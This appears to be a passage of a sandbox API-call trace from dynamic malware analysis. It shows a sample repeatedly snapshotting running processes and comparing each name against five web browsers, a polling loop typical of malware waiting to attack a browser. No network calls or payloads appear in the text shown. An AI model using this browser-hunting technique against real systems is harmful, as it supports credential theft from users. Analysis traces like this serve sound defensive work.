cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0216.772] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0216.772] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0216.772] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0216.772] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0216.772] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.772] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0216.772] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0216.772] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0216.772] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0216.772] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0216.773] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.773] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0216.773] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0216.773] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0216.773] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0216.773] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0216.773] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.773] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0216.774] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0216.774] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0216.774] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0216.774] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0216.774] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.774] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0216.774] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0216.774] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0216.774] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0216.774] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0216.774] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.774] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0216.775] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0216.775] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0216.775] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0216.775] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0216.775] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.775] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0216.775] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0216.775] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0216.775] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0216.775] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0216.775] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.775] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0216.776] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0216.776] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0216.776] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0216.776] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0216.776] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.776] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0216.776] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0216.776] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0216.777] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0216.777] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0216.777] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.777] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0216.777] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0216.777] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0216.777] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0216.777] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0216.777] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.777] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0216.778] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0216.778] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0216.778] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0216.778] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0216.778] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.778] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0216.778] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0216.778] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0216.778] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0216.778] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0216.778] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.778] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0216.779] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0216.779] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0216.779] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0216.779] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0216.779] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.779] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0216.779] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0216.779] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0216.779] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0216.779] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0216.779] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.779] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0216.780] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0216.780] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0216.780] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0216.780] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0216.780] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.780] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0216.781] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0216.781] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0216.781] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0216.781] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0216.781] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.781] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0216.781] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0216.781] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0216.781] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0216.781] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0216.781] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.781] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0216.782] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0216.782] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0216.782] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0216.782] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0216.782] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.782] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0216.782] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0216.782] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0216.782] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0216.782] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0216.782] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.782] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0216.783] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0216.783] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0216.783] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0216.783] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0216.783] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.783] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0216.783] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0216.783] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0216.783] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0216.783] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0216.784] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.784] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.784] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0216.784] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0216.784] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0216.784] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0216.784] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.784] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.785] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.785] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.785] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.785] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.785] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.785] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0216.785] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0216.785] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0216.785] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0216.785] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0216.785] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.785] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.786] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.786] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.786] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.786] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.786] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.786] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0216.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0216.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0216.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0216.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.787] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.787] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.787] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.787] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.787] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0216.787] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.787] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0216.788] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0216.788] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0216.788] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0216.788] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0216.788] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.788] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.788] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0216.788] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0216.789] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0216.789] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0216.789] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.789] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.789] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.789] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.789] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.789] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0216.789] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.789] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.790] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0216.790] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.790] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.791] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.791] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.791] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.791] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0216.791] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.791] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0216.791] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0216.791] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0216.791] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0216.791] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0216.791] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0216.791] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0216.792] CloseHandle (hObject=0xe8) returned 1 [0216.792] Sleep (dwMilliseconds=0x3e8) [0217.816] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0217.818] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.819] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0217.819] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0217.819] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0217.819] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0217.819] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0217.819] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.819] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0217.819] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0217.819] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0217.819] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0217.819] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0217.819] 